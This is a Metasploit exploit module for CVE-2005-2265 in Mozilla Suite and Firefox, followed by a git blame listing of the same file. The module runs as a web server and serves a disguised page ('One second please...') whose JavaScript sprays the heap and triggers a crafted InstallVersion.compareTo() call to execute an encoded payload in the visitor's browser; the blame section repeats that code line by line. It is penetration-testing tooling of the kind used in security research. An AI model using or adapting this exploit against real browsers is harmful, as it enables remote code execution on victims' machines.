modules/exploits/multi/browser/mozilla_compareto.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  #
  # This module acts as an HTTP server
  #
  include Msf::Exploit::Remote::HttpServer::HTML

  # include Msf::Exploit::Remote::BrowserAutopwn
  # The version for this vuln is tricky because it affects mozilla 1.7-1.7.10
  # and firefox 1.0-1.0.4, so we set minver and maxver to the outer bounds.
  # autopwn_info({
  #  :ua_name => HttpClients::FF,
  #  :ua_minver => "1.0",
  #  :ua_maxver => "1.7.10",
  #  :os_name => OperatingSystems::Match::WINDOWS,
  #  :javascript => true,
  #  :rank => NormalRanking, # reliable memory corruption
  #  :vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",
  # })

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Mozilla Suite/Firefox compareTo() Code Execution',
        'Description' => %q{
          This module exploits a code execution vulnerability in the Mozilla
          Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
          module is a direct port of Aviv Raff's HTML PoC.
        },
        'License' => MSF_LICENSE,
        'Author' => ['hdm', 'Aviv Raff <avivra[at]gmail.com>'],
        'References' => [
          ['CVE', '2005-2265'],
          ['OSVDB', '17968'],
          ['BID', '14242'],
          ['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'],
        ],
        'Payload' => {
          'Space' => 400,
          'BadChars' => "\x00",
        },
        'Platform' => %w{win},
        'Targets' => [
          # Tested against Firefox 1.0.4 and Mozilla 1.7.1 on
          # WinXP-SP3 and Win2kAS-SP0
          [
            'Firefox < 1.0.5, Mozilla < 1.7.10, Windows',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86,
              'Ret' => 0x0c0c0c0c,
            }
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2005-07-13',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def on_request_uri(cli, request)
    # Re-generate the payload
    return if ((p = regenerate_payload(cli)) == nil)

    print_status("Sending #{self.name}")
    send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })

    # Handle the payload
    handler(cli)
  end

  def generate_html(payload)
    enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
    enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))

    spray_to = sprintf("0x%.8x", target.ret)
    spray_slide1 = Rex::Text.to_unescape([target.ret].pack('V'), Rex::Arch.endian(target.arch))
    spray_slide2 = Rex::Text.to_unescape([target.ret].pack('V'), Rex::Arch.endian(target.arch))
    eax_address = sprintf("0x%.8x", target.ret)

    return %Q|
<html>
<head>
<!--
  Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module)
  From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx
  Greets: SkyLined, The Insider and shutdown
-->
  <title>One second please...</title>
  <script language="javascript">

    function BodyOnLoad()
    {
      location.href="javascript:void (new InstallVersion());";
      CrashAndBurn();
    };

    #{js_heap_spray}
    // The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
    function CrashAndBurn()
    {
      // Payload - Just return..
      var payLoadCode=unescape("#{enc_code}");

      // Size of the heap blocks
      var heapBlockSize=0x400000;
      sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38));

      // Set address to fake "pdata".
      var eaxAddress = #{eax_address};

      //	This was taken from shutdown's PoC in bugzilla
      // struct vtbl { void (*code)(void); };
      // struct data { struct vtbl *pvtbl; };
      //
      // struct data *pdata = (struct data *)(xxAddress & ~0x01);
      // pdata->pvtbl->code(pdata);
      //
      (new InstallVersion).compareTo(new Number(eaxAddress >> 1));
    }
// -->
  </script>
</head>
<body onload="BodyOnLoad()">
</body>
</html>
    |
  end
end
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules 2007-02-18 00:10:39 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Exploit::Remote`
add ranking to every exploit module, pfew! 2009-12-06 05:50:37 +00:00			`Rank = NormalRanking`
Retab modules 2013-08-30 16:28:54 -05:00
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`#`
			`# This module acts as an HTTP server`
			`#`
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::HttpServer::HTML`
Retab modules 2013-08-30 16:28:54 -05:00
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`# include Msf::Exploit::Remote::BrowserAutopwn`
add minver and maxver. slightly tricky because the vuln affects moz 1.7 and ff 1.0 2009-12-15 21:54:24 +00:00			`# The version for this vuln is tricky because it affects mozilla 1.7-1.7.10`
			`# and firefox 1.0-1.0.4, so we set minver and maxver to the outer bounds.`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`# autopwn_info({`
Reduce number of modules available on BrowserAutopwn 2013-11-12 12:37:29 -06:00			`# :ua_name => HttpClients::FF,`
			`# :ua_minver => "1.0",`
			`# :ua_maxver => "1.7.10",`
Introduce and use OS matching constants 2014-05-28 14:35:22 -05:00			`# :os_name => OperatingSystems::Match::WINDOWS,`
Reduce number of modules available on BrowserAutopwn 2013-11-12 12:37:29 -06:00			`# :javascript => true,`
			`# :rank => NormalRanking, # reliable memory corruption`
			`# :vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`# })`
Retab modules 2013-08-30 16:28:54 -05:00
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`def initialize(info = {})`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`super(`
			`update_info(`
			`info,`
			`'Name' => 'Mozilla Suite/Firefox compareTo() Code Execution',`
			`'Description' => %q{`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`This module exploits a code execution vulnerability in the Mozilla`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit`
			`module is a direct port of Aviv Raff's HTML PoC.`
			`},`
			`'License' => MSF_LICENSE,`
			`'Author' => ['hdm', 'Aviv Raff <avivra[at]gmail.com>'],`
			`'References' => [`
			`['CVE', '2005-2265'],`
			`['OSVDB', '17968'],`
			`['BID', '14242'],`
			`['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'],`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Payload' => {`
			`'Space' => 400,`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`'BadChars' => "\x00",`
			`},`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'Platform' => %w{win},`
			`'Targets' => [`
fixes 688. better return address for greater reliability, works against FF-1.0.4 and Moz-1.7.1 on XPSP3 and 2kAS-SP0 2009-12-14 23:27:28 +00:00			`# Tested against Firefox 1.0.4 and Mozilla 1.7.1 on`
			`# WinXP-SP3 and Win2kAS-SP0`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`[`
			`'Firefox < 1.0.5, Mozilla < 1.7.10, Windows',`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`{`
			`'Platform' => 'win',`
			`'Arch' => ARCH_X86,`
fixes 688. better return address for greater reliability, works against FF-1.0.4 and Moz-1.7.1 on XPSP3 and 2kAS-SP0 2009-12-14 23:27:28 +00:00			`'Ret' => 0x0c0c0c0c,`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`}`
			`],`
			`],`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`'DefaultTarget' => 0,`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`'DisclosureDate' => '2005-07-13',`
			`'Notes' => {`
Update info -d markdown 2025-06-23 12:43:46 +01:00			`'Reliability' => UNKNOWN_RELIABILITY,`
			`'Stability' => UNKNOWN_STABILITY,`
			`'SideEffects' => UNKNOWN_SIDE_EFFECTS`
Adds sentinel values to modules missing notes 2025-06-23 12:00:29 +01:00			`}`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`)`
			`)`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`def on_request_uri(cli, request)`
			`# Re-generate the payload`
			`return if ((p = regenerate_payload(cli)) == nil)`
Retab modules 2013-08-30 16:28:54 -05:00
Remove spurious cli.peerhost in output 2012-04-20 13:31:42 -06:00			`print_status("Sending #{self.name}")`
API change for the HTML mixin, the send_response method is no longer overloaded, instead exploits must call send_response_html to enable HTML evasion. The old method caused problems when a exploit needed HTML and non-HTML response capabilities 2006-12-10 03:26:53 +00:00			`send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })`
Retab modules 2013-08-30 16:28:54 -05:00
Consistent use of handler(cli), removed the autofilter and dependency check stubs 2007-04-04 04:37:30 +00:00			`# Handle the payload`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`handler(cli)`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`def generate_html(payload)`
			`enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))`
			`enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))`
Retab modules 2013-08-30 16:28:54 -05:00
fixes 688. better return address for greater reliability, works against FF-1.0.4 and Moz-1.7.1 on XPSP3 and 2kAS-SP0 2009-12-14 23:27:28 +00:00			`spray_to = sprintf("0x%.8x", target.ret)`
Runs Rubocop to fix layout in modules 2025-06-20 13:20:44 +01:00			`spray_slide1 = Rex::Text.to_unescape([target.ret].pack('V'), Rex::Arch.endian(target.arch))`
			`spray_slide2 = Rex::Text.to_unescape([target.ret].pack('V'), Rex::Arch.endian(target.arch))`
fixes 688. better return address for greater reliability, works against FF-1.0.4 and Moz-1.7.1 on XPSP3 and 2kAS-SP0 2009-12-14 23:27:28 +00:00			`eax_address = sprintf("0x%.8x", target.ret)`
Retab modules 2013-08-30 16:28:54 -05:00
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`return %Q\|`
			`<html>`
			`<head>`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`<!--`
tons of indentation fixes, some other style tweaks 2010-09-20 08:06:27 +00:00			`Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module)`
			`From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx`
			`Greets: SkyLined, The Insider and shutdown`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`-->`
			`<title>One second please...</title>`
			`<script language="javascript">`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`function BodyOnLoad()`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`{`
			`location.href="javascript:void (new InstallVersion());";`
			`CrashAndBurn();`
			`};`
Retab modules 2013-08-30 16:28:54 -05:00
fixes 688. better return address for greater reliability, works against FF-1.0.4 and Moz-1.7.1 on XPSP3 and 2kAS-SP0 2009-12-14 23:27:28 +00:00			`#{js_heap_spray}`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`function CrashAndBurn()`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`{`
			`// Payload - Just return..`
			`var payLoadCode=unescape("#{enc_code}");`
Retab modules 2013-08-30 16:28:54 -05:00
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`// Size of the heap blocks`
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`var heapBlockSize=0x400000;`
fixes 688. better return address for greater reliability, works against FF-1.0.4 and Moz-1.7.1 on XPSP3 and 2kAS-SP0 2009-12-14 23:27:28 +00:00			`sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38));`
Retab modules 2013-08-30 16:28:54 -05:00
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`// Set address to fake "pdata".`
reverting last commit; somebody didn't cross their fingers 2009-07-19 20:48:47 +00:00			`var eaxAddress = #{eax_address};`
Retab modules 2013-08-30 16:28:54 -05:00
Fixed Rex::Arch.endian() 2006-07-31 02:50:41 +00:00			`// This was taken from shutdown's PoC in bugzilla`
			`// struct vtbl { void (*code)(void); };`
			`// struct data { struct vtbl *pvtbl; };`
			`//`
			`// struct data pdata = (struct data )(xxAddress & ~0x01);`
			`// pdata->pvtbl->code(pdata);`
			`//`
			`(new InstallVersion).compareTo(new Number(eaxAddress >> 1));`
			`}`
			`// -->`
			`</script>`
			`</head>`
			`<body onload="BodyOnLoad()">`
			`</body>`
			`</html>`
			`\|`
			`end`
OSVDB references updates from Steve Tornio 2009-07-16 16:02:24 +00:00			`end`